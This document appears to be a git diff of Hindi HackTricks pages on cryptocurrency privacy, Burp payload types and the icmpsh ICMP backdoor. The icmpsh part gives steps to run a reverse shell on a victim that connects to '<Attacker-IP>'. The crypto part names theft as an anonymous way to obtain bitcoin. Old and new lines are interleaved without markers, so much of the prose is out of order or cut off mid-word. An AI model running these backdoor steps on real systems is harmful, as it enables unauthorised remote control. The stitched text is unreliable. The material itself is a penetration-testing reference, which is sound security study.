* **सटीक भुगतान राशियाँ**: परिवर्तन के साथ लेन-देन से बचने के लिए, भुगतान को UTXO के बराबर होना चाहिए (जो अत्यधिक अपेक्षित है)। इसलिए, एक **भुगतान जिसमें कोई परिवर्तन पता नहीं है, संभावित रूप से एक ही उपयोगकर्ता के 2 पतों के बीच स्थानांतरण है**।
|
||||
* **गोल नंबर**: एक लेन-देन में, यदि आउटपुट में से एक "**गोल नंबर**" है, तो यह उचित है कि यह एक **इंसान को भुगतान करने के लिए जो उसने वह** "गोल नंबर" **मूल्य** डाला है, इसलिए अन्य हिस्सा बचा होना चाहिए।
|
||||
* **वॉलेट फिंगरप्रिंटिंग:** एक सावधान विश्लेषक कभी-कभी यह निर्धारित कर सकता है कि कौन सा सॉफ्टवेयर किस लेन-देन को बनाया, क्योंकि **कई विभिन्न वॉलेट सॉफ्टवेयर हमेशा बिल्कुल एक ही तरीके से लेन-देन नहीं करते**। वॉलेट फिंगरप्रिंटिंग का उपयोग परिवर्तन आउटपुट का पता लगाने के लिए किया जा सकता है क्योंकि एक परिवर्तन आउटपुट वह है जिसे एक ही वॉलेट फिंगरप्रिंट के साथ खर्च किया गया है।
|
||||
* **राशि और समय संबंध**: यदि व्यक्ति जिसने लेन-देन किया है **समय** और/या **राशि** का खुलासा करता है, तो इसे आसानी से **खोजा जा सकता है**।
|
||||
नेटवर्क ट्रैफिक का मॉनिटरिंग करके हमलावर लेन-देन या ब्लॉक को आईपी पतों से जोड़ सकते हैं, उपयोगकर्ता गोपनीयता को कमजोर करते हैं। यह विशेष रूप से सत्य है अगर कोई संस्था बहुत सारे बिटकॉइन नोड चलाती है, जिससे उनकी लेन-देनों को मॉनिटर करने की क्षमता बढ़ जाती है।
|
||||
|
||||
## ट्रैफिक विश्लेषण
|
||||
|
||||
कुछ संगठन **आपके ट्रैफिक को स्निफ करते** हुए आपको बिटकॉइन नेटवर्क में संचार करते हुए देख सकते हैं।\
|
||||
यदि प्रतिकूल एक लेन-देन या ब्लॉक देखता है **जो आपके नोड से निकल रहा है जिससे पहले नहीं आया था**, तो यह निश्चितता के साथ जान सकता है कि **लेन-देन आपके द्वारा किया गया था या ब्लॉक आपके द्वारा खनित हुआ था**। इंटरनेट कनेक्शन शामिल होने के कारण, प्रतिकूल व्यक्ति को खोजने में सक्षम होगा कि खोजे गए बिटकॉइन सूचना के साथ IP पता को जोड़ सकता है।
|
||||
|
||||
एक हमलावर जो सभी इंटरनेट ट्रैफिक को स्निफ नहीं कर सकता है लेकिन जिसके पास **बहुत सारे बिटकॉइन नोड** होते हैं ताकि वह **स्रोतों के करीब रह सके**, वह जान सकता है कि कौन से IP पते लेन-देन या ब्लॉक की घोषणा कर रहे हैं।\
|
||||
इसके अलावा, कुछ वॉलेट समय-समय पर अपुष्ट लेन-देन को फिर से प्रसारित करते हैं ताकि वे नेटवर्क में व्यापक रूप से प्रसारित होने और खनित होने की अधिक संभावना हो।
|
||||
|
||||
## पतों के मालिक के बारे में जानकारी प्राप्त करने के लिए अन्य हमले
|
||||
|
||||
अधिक हमलों के लिए पढ़ें [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
|
||||
|
||||
# अनाम बिटकॉइन
|
||||
|
||||
## बिटकॉइन गुमनामता से प्राप्त करना
|
||||
|
||||
* **नकद व्यापार:** नकद का उपयोग करके बिटकॉइन खरीदें।
|
||||
* **नकद के समर्थक:** गिफ्ट कार्ड या समान क्रय करें और उन्हें ऑनलाइन बिटकॉइन के लिए विनिमय करें।
|
||||
* **खनन:** खनन बिटकॉइन प्राप्त करने का सबसे गुमनाम तरीका है। यह सोलो-खनन के लिए लागू है क्योंकि [खनन पूल](https://en.bitcoin.it/wiki/Pooled\_mining) आम तौर पर हैशर का IP पता जानते हैं।
|
||||
* **चोरी:** सिद्धांत में एक और गुमनाम तरीका बिटकॉइन प्राप्त करने का यह है कि उन्हें चुराया जाए।
|
||||
|
||||
## मिक्सर
|
||||
|
||||
एक उपयोगकर्ता **मिक्सिंग सेवा को बिटकॉइन भेजेगा** और सेवा **उपयोगकर्ता को विभिन्न बिटकॉइन वापस भेजेगी**, एक शुल्क कम करके। सिद्धांत में, ब्लॉकचेन को अवलोकन करने वाला दुश्मन **आने वाले और जाने वाले लेन-देन को जोड़ने में असमर्थ होगा**।
|
||||
|
||||
हालांकि, उपयोगकर्ता को मिक्सिंग सेवा पर भरोसा करना होगा कि वह बिटकॉइन वापस करेगी और यह भी नहीं रिकॉर्ड सहेज रही है कि पैसे प्राप्त और भेजे गए धन के बीच संबंधों के बारे में।\
|
||||
कुछ अन्य सेवाएं भी मिक्सर के रूप में उपयोग की जा सकती हैं, जैसे बिटकॉइन कैसीनो जहां आप बिटकॉइन भेज सकते हैं और बाद में उन्हें पुनः प्राप्त कर सकते हैं।
|
||||
|
||||
## कॉइनजॉइन
|
||||
|
||||
**कॉइनजॉइन** एक उपयोगकर्ताओं के कई लेन-देन को केवल एक में मिलाएगा ताकि एक अवलोकक को पता लगाना अधिक **कठिन** हो जिस इनपुट किस आउटपुट से संबंधित है।\
|
||||
यह एक नई स्तर की गोपनीयता प्रदान करता है, हालांकि, **कुछ** **लेन-देन** जहां कुछ इनपुट और आउटपुट राशियाँ संबंधित हैं या बाकी इनपुट और आउटपुट से बहुत अलग हैं **बाहरी अवलोकक द्वारा संबंधित हो सकते हैं**।
|
||||
|
||||
बिटकॉइन की ब्लॉकचेन पर (संभावित) कॉइनजॉइन लेन-देन आईडी के उदाहरण हैं `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` और `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`।
|
||||
|
||||
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
|
||||
**कॉइनजॉइन के लिए समान लेकिन बेहतर और एथीरियम के लिए आपके पास** [**ट
|
||||
```
|
||||
## अधिक
|
||||
गोपनीयता हमलों और रक्षा की व्यापक सूची के लिए, [बिटकॉइन गोपनीयता पर बिटकॉइन विकि](https://en.bitcoin.it/wiki/Privacy) पर जाएं।
|
||||
```plaintext
|
||||
2 btc --> 3 btc
|
||||
5 btc 4 btc
|
||||
```
|
||||
# बिटकॉइन गोपनीयता अच्छी प्रथाएं
|
||||
Transactions जैसे ऊपर किये गए PayJoin हो सकते हैं, जो मानक बिटकॉइन लेन-देन से अलग होते हुए गोपनीयता को बढ़ा सकते हैं।
|
||||
|
||||
## वॉलेट समक्रमण
|
||||
**PayJoin का उपयोग पारंपरिक निगरानी विधियों को काफी व्यवधान कर सकता है**, जिससे लेन-देनीय गोपनीयता की पुरस्कृति में एक आशाजनक विकास हो सकता है।
|
||||
|
||||
बिटकॉइन वॉलेट को अपने शेष और इतिहास के बारे में जानकारी कैसे प्राप्त करनी चाहिए। देर से 2018 के अनुसार सबसे व्यावहारिक और निजी मौजूदा समाधान हैं एक **पूर्ण नोड वॉलेट** (जो अधिकतम निजी है) और **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग** (जो बहुत अच्छा है)।
|
||||
# क्रिप्टोकरेंसी में गोपनीयता के लिए सर्वोत्तम अभ्यास
|
||||
|
||||
* **पूर्ण नोड:** पूर्ण नोड पूरे ब्लॉकचेन को डाउनलोड करते हैं जिसमें बिटकॉइन में हुए हर ऑन-चेन [लेन-देन](https://en.bitcoin.it/wiki/Transaction) शामिल है। इसलिए एक प्रतिकूल उपयोगकर्ता की इंटरनेट कनेक्शन को देख रहे शत्रु को यह पता नहीं चलेगा कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है।
|
||||
* **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग:** क्लाइंट-साइड ब्लॉक फ़िल्टरिंग काम करता है जिसमें **फ़िल्टर** बनाए जाते हैं जो ब्लॉक में हर लेन-देन के सभी **पते** को शामिल करते हैं। फ़िल्टर यह जांच सकते हैं कि क्या कोई **तत्व सेट में है**; गलत पॉजिटिव्स संभव हैं लेकिन गलत नेगेटिव्स नहीं। एक हल्का वॉलेट सभी ब्लॉक में अपने **पतों** के साथ मेल खाता है और इसके **पास** **पते** के मिलान की जांच करता है। मिलान वाले निर्देशिका से वह ब्लॉक पूरे डाउनलोड करेगा, और उन ब्लॉक का उपयोग वॉलेट के इतिहास और वर्तमान शेष को प्राप्त करने के लिए किया जाएगा।
|
||||
## **वॉलेट समक्रमण तकनीकें**
|
||||
|
||||
## टॉर
|
||||
गोपनीयता और सुरक्षा बनाए रखने के लिए वॉलेट को ब्लॉकचेन के साथ समक्रमित करना महत्वपूर्ण है। दो तकनीकों में उत्कृष्टता है:
|
||||
|
||||
बिटकॉइन नेटवर्क एक पीर-टू-पीर नेटवर्क का उपयोग करता है, जिसका मतलब है कि अन्य पीयर आपका आईपी पता सीख सकते हैं। इसलिए यह सिफारिश की जाती है कि आप **बिटकॉइन नेटवर्क के साथ संवाद करना चाहते हैं तो हर बार टॉर के माध्यम से कनेक्ट करें**।
|
||||
- **पूर्ण नोड**: पूर्ण नोड द्वारा पूरे ब्लॉकचेन को डाउनलोड करके, एक पूर्ण नोड गोपनीयता को अधिकतम सुनिश्चित करता है। सभी किए गए लेन-देन स्थानीय रूप से संग्रहीत होते हैं, जिससे प्रतिकूलकों को पहचानना असंभव हो जाता है कि उपयोगकर्ता किस लेन-देन या पतों में रुचि रखता है।
|
||||
- **क्लाइंट-साइड ब्लॉक फ़िल्टरिंग**: यह तकनीक ब्लॉकचेन में हर ब्लॉक के लिए फ़िल्टर बनाने को शामिल है, जिससे वॉलेट नेटवर्क अवलोककर्ताओं को विशेष रुचियों को प्रकट किए बिना संबोधित लेन-देन की पहचान कर सकते हैं। हल्के वॉलेट इन फ़िल्टर्स को डाउनलोड करते हैं, केवल जब उपयोगकर्ता के पतों के साथ मेल खाता है तो पूरे ब्लॉक्स को लाते हैं।
|
||||
|
||||
## पते का पुनः उपयोग न करना
|
||||
## **गोपनीयता के लिए Tor का उपयोग**
|
||||
|
||||
**पतों का अधिक से अधिक एक बार से अधिक उपयोग करना गोपनीयता के लिए बहुत हानिकारक है क्योंकि यह अधिक ब्लॉकचेन लेन-देन को जोड़ता है जिसमें यह साबित होता है कि वे एक ही एकाइ द्वारा बनाए गए थे**। बिटकॉइन का सबसे निजी और सुरक्षित तरीका यह है कि जो व्यक्ति आपको भुगतान करता है, उसे प्रत्येक व्यक्ति को एक नया पता भेजा जाए। प्राप्त किए गए सिक्के खर्च कर दिए जाने के बाद पता कभी भी फिर से उपयोग नहीं किया जाना चाहिए। साथ ही, जब बिटकॉइन भेजा जाए तो एक नया बिटकॉइन पता मांगा जाना चाहिए। सभी अच्छे बिटकॉइन वॉलेट में उपयोगकर्ता इंटरफेस होता है जो पते का पुनः उपयोग न करने की सलाह देता है।
|
||||
बिटकॉइन पीयर-टू-पीयर नेटवर्क पर काम करते हुए, Tor का उपयोग आपके आईपी पते को मास्क करने के लिए सिफारिश किया जाता है, जिससे नेटवर्क के साथ बातचीत करते समय गोपनीयता में वृद्धि हो।
|
||||
|
||||
## एकाधिक लेन-देन
|
||||
## **पते के पुनः उपयोग से बचाव**
|
||||
|
||||
**किसी को एक से अधिक ऑन-चेन लेन-देन के माध्यम से भुगतान करना राशि-आधारित गोपनीयता हमलों की शक्ति को बहुत कम कर सकता है जैसे कि राशि संबंध और गोल नंबर**। उदाहरण के लिए, यदि उपयोगकर्ता किसी को 5 BTC भुगतान करना चाहता है और उन्हें चाहिए कि 5 BTC मूल्य आसानी से खोजा न जा सके, तो वे 2 BTC और 3 BTC के मूल्य के लिए दो लेन-देन भेज सकते हैं जो मिलाकर 5 BTC के बराबर होते हैं।
|
||||
गोपनीयता की रक्षा के लिए, प्रत्येक लेन-देन के लिए एक नया पता उपयोग करना महत्वपूर्ण है। पतों का पुनः उपयोग गोपनीयता को खतरे में डाल सकता है क्योंकि यह लेन-देन को एक ही एकता से जोड़ सकता है। आधुनिक वॉलेट अपने डिज़ाइन के माध्यम से पते के पुनः उपयोग को निषेधित करते हैं।
|
||||
|
||||
## बदला टालना
|
||||
## **लेन-देन गोपनीयता के लिए रणनीतियाँ**
|
||||
|
||||
बदला टालना एक ऐसी स्थिति है जहाँ लेन-देन के इनपुट और आउटपुट को ध्यान से चुना जाता है ताकि किसी भी बदला आउटपुट की आवश्यकता न हो। **किसी भी बदला आउटपुट का न होना गोपनीयता के लिए उत्कृष्ट है**, क्योंकि यह बदला पता लगाने के नियमों को तोड़ता है।
|
||||
- **एकाधिक लेन-देन**: भुगतान को कई लेन-देन में विभाजित करना लेन-देन राशि को अस्पष्ट कर सकता है, गोपनीयता हमलों को नाकाम बना सकता है।
|
||||
- **बदलाव टालना**: बदलाव की आवश्यकता न होने पर, बदलाव उत्पादन के लिए लेन-देन का चयन करना गोपनीयता को बढ़ा सकता है जिससे बदलाव की पहचान की विधियों को विघटित किया जा सकता है।
|
||||
- **एकाधिक बदलाव उत्पादन**: यदि बदलाव टालना संभव नहीं है, तो एकाधिक बदलाव उत्पादन भी गोपनीयता में सुधार कर सकता है।
|
||||
|
||||
## एकाधिक बदला आउटपुट
|
||||
# **Monero: एक गोपनीयता का प्रकाश**
|
||||
|
||||
यदि बदला टालना एक विकल्प नहीं है तो **एक से अधिक बदला आउटपुट बनाने से गोपनीयता में सुधार हो सकता है**। यह भी बदला पता लगाने के नियमों को तोड़ता है जो सामान्यत: केवल एकल बदला आउटपुट होने का अनुमान करते हैं। जैसा कि यह विधि सामान्य से अधिक ब्लॉक स्थान का उपयोग करती है, बदला टालना अधिक अच्छा है।
|
||||
Monero डिजिटल लेन-देन में पूर्ण गोपनीयता की आवश्यकता को संबोधित करता है, गोपनीयता के लिए एक उच्च मानक स्थापित करता है।
|
||||
|
||||
# मोनेरो
|
||||
# **Ethereum: गैस और लेन-देन**
|
||||
|
||||
जब मोनेरो विकसित किया गया था, तो पूरी गोपनीयता की आवश्यकता थी जिसे यह हल करने का प्रयास किया गया था, और बड़े हिस्से में, यह उस शून्यता को भर दिया है।
|
||||
## **गैस को समझना**
|
||||
|
||||
# इथेरियम
|
||||
गैस एथेरियम पर ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणना प्रयास को मापता है, **ग्वेई** में मूल्यांकन किया जाता है। उदाहरण के लिए, 2,310,000 ग्वेई (या 0.00231 ईथ) का लेन-देन एक गैस सीमा और एक मूल शुल्क के साथ होता है, जिसमें खान में प्रेरित करने के लिए एक टिप शामिल है। उपयोगकर्ता अधिक भुगतान न करें, इसके अतिरिक्त रिफंड किया जाता है।
|
||||
|
||||
## गैस
|
||||
## **लेन-देन कार्यान्वित करना**
|
||||
|
||||
गैस उनिट को सूचित करता है जो इथेरियम नेटवर्क पर विशेष ऑपरेशन को कार्यान्वित करने के लिए आवश्यक गणनात्मक प्रयास की मात्रा को मापता है। गैस इथेरियम पर एक लेन-देन सफलतापूर्वक करने के लिए आवश्यक शुल्क को सूचित करता है।
|
||||
एथेरियम में लेन-देन एक भेजने वाले और प्राप्तकर्ता के बीच होते हैं, जो या तो उपयोगकर्ता हो सकते हैं या स्मार्ट कॉन्ट्रैक्ट पते हो सकते हैं। इन्हें एक शुल्क की आवश्यकता होती है और उन्हें खनन किया जाना चाहिए। लेन-देन में महत्वपूर्ण जानकारी में प्राप्तकर्ता, भेजने वाले के हस्ताक्षर, मूल्य, वैकल्पिक डेटा, गैस सीमा, और शुल्क शामिल हैं। विशेष रूप से, भेजने वाले का पता हस्ताक्षर से निकाला जाता है, जिससे लेन-देन डेटा में इसकी आवश्यकता नहीं होती।
|
||||
|
||||
गैस मूल्य को **ग्वेई** में दर्शाया जाता है, जो खुद इथ का एक मापन है - प्रत्येक ग्वेई 0.000000001 इथ (10-9 इथ) के बराबर है। उदाहरण के लिए, यदि आपका गैस 0.000000001 इथ है, तो आप कह सकते हैं कि आपका गैस 1 ग्वेई का है। 'ग्वेई' शब्द खुद में 'गिगा-वेई' का अर्थ है, और यह 1,000,000,000 वेई के बराबर है। वेई खुद इथ की **सबसे छोटी इकाई** है।
|
||||
ये अभ्यास और तंत्र उन सभी लोगों के लिए मौलिक हैं जो क्रिप्टोकरेंसी के साथ संलग्न होने की दृष्टि से गोपनीयता और सुरक्षा को प्राथमिकता देते हैं।
|
||||
|
||||
एक लेन-देन की गैस की गणना करने के लिए इस उदाहरण को पढ़ें:
|
||||
## संदर्भ
|
||||
|
||||
मान लें कि जॉर्डन को टेलर को 1 इथ देना है। लेन-देन में गैस सीमा 21,000 इकाइयाँ हैं और बेस शुल्क 100 ग्वेई है। जॉर्डन ने 10 ग्वेई की टिप शामिल की है।
|
||||
|
||||
ऊपर दिए गए सूत्र का उपयोग करके हम इसे गणना कर सकते हैं `21,000 * (100 + 10) = 2,310,000 ग्वेई` या 0.00231 इथ।
|
||||
|
||||
जब जॉर्डन पैसे भेजता है, तो 1.00231 इथ जॉर्डन के खाते से कटा जाएगा। टेलर को 1.0000 इथ क्रेडिट किया जाएगा। खननकर्ता को 0.00021 इथ की टिप मिलेगी। 0.0021 इथ का बेस शुल्क जला दिया जाएगा।
|
||||
|
||||
इसके अतिरिक्त, जॉर्डन लेन-देन के लिए एक अधिकतम शुल्क (`maxFeePer
|
||||
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
|
||||
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
|
||||
* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
|
||||
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
|
|
|
@ -1,43 +1,45 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# मूल Payloads
|
||||
# मूल पेलोड
|
||||
|
||||
* **सरल सूची:** बस एक सूची जिसमें प्रत्येक पंक्ति में एक प्रविष्टि होती है
|
||||
* **रनटाइम फ़ाइल:** एक सूची जो रनटाइम में पढ़ी जाती है (मेमोरी में लोड नहीं होती)। बड़ी सूचियों का समर्थन करने के लिए।
|
||||
* **केस मॉडिफिकेशन:** स्ट्रिंग्स की एक सूची में कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचले केस में, ऊपरी केस में, प्रॉपर नाम - पहला अक्षर बड़ा और बाकी निचले केस में-, प्रॉपर नाम -पहला अक्षर बड़ा और बाकी वैसे ही रहते हैं-।
|
||||
* **संख्याएँ:** X से Y तक Z कदम या यादृच्छिक रूप से संख्याएँ उत्पन्न करें।
|
||||
* **ब्रूट फोर्सर:** अक्षर सेट, न्यूनतम और अधिकतम लंबाई।
|
||||
* **सरल सूची:** हर पंक्ति में एक प्रविष्टि वाली सूची
|
||||
* **रनटाइम फ़ाइल:** रनटाइम में पढ़ी गई सूची (मेमोरी में लोड नहीं की गई)। बड़ी सूचियों का समर्थन करने के लिए।
|
||||
* **केस संशोधन:** स्ट्रिंग की सूची पर कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचे, ऊपर, सही नाम - पहले बड़ा अक्षर और बाकी को छोटा करें-, सही नाम - पहले बड़ा अक्षर और बाकी वैसा ही रहेगा-।
|
||||
* **नंबर्स:** X से Y तक नंबर उत्पन्न करें Z कदम या यादृच्छिक रूप से।
|
||||
* **ब्रूट फोर्सर:** वर्ण सेट, न्यूनतम और अधिकतम लंबाई।
|
||||
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : DNS अनुरोधों के माध्यम से कमांड्स को निष्पादित करने और आउटपुट प्राप्त करने के लिए Payload।
|
||||
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : कमांड निष्पादित करने और आउटपुट को बर्पकोलब के माध्यम से DNS अनुरोधों के माध्यम से पकड़ने के लिए पेलोड।
|
||||
|
||||
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
|
||||
|
||||
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
40
c2/icmpsh.md
40
c2/icmpsh.md
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
बैकडोर डाउनलोड करें: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
|
||||
|
@ -19,7 +20,7 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
स्क्रिप्ट को निष्पादित करें: **run.sh**
|
||||
|
||||
**यदि आपको कोई त्रुटि मिलती है, तो पंक्तियों को बदलने का प्रयास करें:**
|
||||
**अगर आपको कोई त्रुटि मिलती है, तो पंक्तियों को बदलने का प्रयास करें:**
|
||||
```bash
|
||||
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
|
||||
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
|
||||
|
@ -29,22 +30,23 @@ IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
|
|||
echo Please insert the IP where you want to listen
|
||||
read IP
|
||||
```
|
||||
# **शिकारक दल**
|
||||
# **शिकारी पक्ष**
|
||||
|
||||
**icmpsh.exe** को शिकारक के पास अपलोड करें और क्रियान्वित करें:
|
||||
शिकारी पक्ष पर **icmpsh.exe** अपलोड करें और क्रियान्वित करें:
|
||||
```bash
|
||||
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
|
||||
```
|
||||
